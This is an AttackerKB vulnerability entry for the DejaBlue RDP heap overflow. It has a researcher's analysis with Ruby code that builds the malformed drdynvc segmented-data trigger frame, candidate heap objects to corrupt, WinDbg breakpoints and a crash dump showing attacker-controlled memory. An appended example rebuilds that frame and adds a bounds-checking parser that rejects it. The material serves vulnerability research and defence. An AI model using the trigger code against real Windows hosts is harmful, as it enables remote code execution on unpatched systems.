AttackerKB AKB:3C6D4A84-B8EE-47A2-A1E9-388F5F32AD27
History: Aug 14, 2019 - 12:00 a.m.

DejaBlue, RDP Heap Overflow

2019-08-14 00:00:00
attackerkb.com

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target system's Remote Desktop Service via RDP.

The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.

Recent assessments:

zeroSteiner at November 14, 2019 5:12pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel, which must be set up first. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending a segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different from a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section 2.2.5.2
  def build_rdp_data_segment(data)
    # RDP_DATA_SEGMENT: size (4 bytes, LE) covers the 1-byte bulk header plus the payload
    encoded = [data.length + 1].pack("L<")
    # RDP8_BULK_ENCODED_DATA header: compression type RDP 8.0, PACKET_COMPRESSED not set
    encoded << "\x04"
    encoded << data
  end

  def build_trigger
    # see [MS-RDPEGFX] section 2.2.5
    rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
    # RDP_SEGMENTED_DATA: descriptor MULTIPART (0xE1), segmentCount 1,
    # uncompressedSize 0x40 - 0x2000 (negative, stored as 0xFFFFE040 on the wire)
    rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
  end

An object needs to be created and corrupted, potential candidates are below.

  Object Name                    Breakpoint Address   Size   Can Create?
  CRdpDynVCMgr ChannelInternal   rdpcorets+c8e03      0x138  Static number can be created
  DecompressRdp8                 rdpcorets+16274a     0x68
  DecompressUnchopper            rdpcorets+12dd1a     0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g"
    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
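As an added example that is not part of the assessment above: a builder and a bounds-checking parser for the [MS-RDPEGFX] RDP_SEGMENTED_DATA (section 2.2.5.1) and RDP_DATA_SEGMENT (section 2.2.5.2) structures, written in Ruby to match the snippet in the analysis. build_trigger_frame reproduces the frame described there (descriptor 0xE1, one segment, uncompressedSize 0x40 - 0x2000), and parse_rdp_segmented_data shows the checks a decoder needs before it trusts that field: the 32-bit uncompressedSize is bounded, every segment size is checked against the bytes actually present, and for uncompressed segments the declared total must equal the bytes carried. MAX_UNCOMPRESSED is an assumed, illustrative limit; nothing here is taken from rdpcorets.dll and it does not claim to be the patched code path.

```ruby
# Builder and bounds-checking parser for [MS-RDPEGFX] RDP_SEGMENTED_DATA
# (2.2.5.1) and RDP_DATA_SEGMENT (2.2.5.2). Added example, not code from
# the assessment; MAX_UNCOMPRESSED is an assumed limit, not a spec value.

SEGMENTED_SINGLE    = 0xE0 # descriptor: RDP8_BULK_ENCODED_DATA follows directly
SEGMENTED_MULTIPART = 0xE1 # descriptor: segmentCount, uncompressedSize, segmentArray

# RDP8_BULK_ENCODED_DATA header byte: low nibble is the compression type
# (0x4 = RDP 8.0 bulk compression), 0x20 is PACKET_COMPRESSED.
BULK_TYPE_RDP8    = 0x04
PACKET_COMPRESSED = 0x20

# Assumed ceiling a defensive decoder would place on uncompressedSize
# before it sizes any allocation or copy.
MAX_UNCOMPRESSED = 64 * 1024 * 1024

class MalformedSegmentedData < StandardError; end

# RDP_DATA_SEGMENT: size (4 bytes LE) covers the bulkData, i.e. the
# 1-byte header plus the payload, so size == data.bytesize + 1.
def build_rdp_data_segment(data, header: BULK_TYPE_RDP8)
  [data.bytesize + 1, header].pack("L<C") + data
end

# MULTIPART RDP_SEGMENTED_DATA. uncompressed_size can be overridden to
# reproduce the malformed frame; it is masked to 32 bits exactly as
# pack("l<") stores a negative value on the wire.
def build_rdp_segmented_data(segments, uncompressed_size: nil)
  uncompressed_size ||= segments.sum(&:bytesize)
  [SEGMENTED_MULTIPART, segments.length, uncompressed_size & 0xFFFFFFFF].pack("CS<L<") +
    segments.map { |s| build_rdp_data_segment(s) }.join
end

# Parse one RDP_DATA_SEGMENT at offset; returns [segment_hash, next_offset].
def parse_rdp_data_segment(buf, offset)
  raise MalformedSegmentedData, "truncated segment size" if buf.bytesize - offset < 4
  size = buf.byteslice(offset, 4).unpack1("L<")
  offset += 4
  raise MalformedSegmentedData, "segment size must cover the bulk header" if size < 1
  raise MalformedSegmentedData, "segment size exceeds buffer" if size > buf.bytesize - offset
  header = buf.getbyte(offset)
  seg = { type: header & 0x0F,
          compressed: (header & PACKET_COMPRESSED) != 0,
          data: buf.byteslice(offset + 1, size - 1) }
  [seg, offset + size]
end

# Parse RDP_SEGMENTED_DATA, rejecting any frame whose declared sizes are
# not consistent with the bytes actually present.
def parse_rdp_segmented_data(buf)
  raise MalformedSegmentedData, "empty frame" if buf.bytesize < 1
  descriptor = buf.getbyte(0)
  case descriptor
  when SEGMENTED_SINGLE
    raise MalformedSegmentedData, "missing bulk header" if buf.bytesize < 2
    header = buf.getbyte(1)
    seg = { type: header & 0x0F, compressed: (header & PACKET_COMPRESSED) != 0,
            data: buf.byteslice(2..-1) || "".b }
    { descriptor: descriptor, uncompressed_size: nil, segments: [seg] }
  when SEGMENTED_MULTIPART
    raise MalformedSegmentedData, "truncated multipart header" if buf.bytesize < 7
    count, uncompressed_size = buf.byteslice(1, 6).unpack("S<L<")
    # The check the vulnerable path needs: uncompressedSize is an
    # attacker-supplied 32-bit value and must be bounded before use.
    if uncompressed_size > MAX_UNCOMPRESSED
      raise MalformedSegmentedData, format("uncompressedSize 0x%08x exceeds limit", uncompressed_size)
    end
    raise MalformedSegmentedData, "segmentCount must be at least 1" if count < 1
    segments = []
    offset = 7
    count.times do
      seg, offset = parse_rdp_data_segment(buf, offset)
      segments << seg
    end
    raise MalformedSegmentedData, "trailing bytes after segmentArray" if offset != buf.bytesize
    # With no compressed segment the declared total must equal the bytes carried.
    if segments.none? { |s| s[:compressed] }
      actual = segments.sum { |s| s[:data].bytesize }
      if actual != uncompressed_size
        raise MalformedSegmentedData, "uncompressedSize #{uncompressed_size} != #{actual} bytes carried"
      end
    end
    { descriptor: descriptor, uncompressed_size: uncompressed_size, segments: segments }
  else
    raise MalformedSegmentedData, format("unknown descriptor 0x%02x", descriptor)
  end
end

# The frame from the analysis: one segment, uncompressedSize 0x40 - 0x2000.
def build_trigger_frame
  payload = ("\x41" * 0x50).b + [0xdead1337dead1337].pack("Q<")
  build_rdp_segmented_data([payload], uncompressed_size: 0x40 - 0x2000)
end

# :accepted or :rejected, so the decoder's verdict can be checked directly.
def classify_frame(buf)
  parse_rdp_segmented_data(buf)
  :accepted
rescue MalformedSegmentedData
  :rejected
end
```

A well-formed two-segment frame parses back to its payloads, while the trigger frame is rejected at the uncompressedSize check before any segment is touched: on the wire 0x40 - 0x2000 is 0xFFFFE040, and a decoder that uses that value to size a destination buffer before checking it is exactly the pattern the analysis describes.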


Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 3
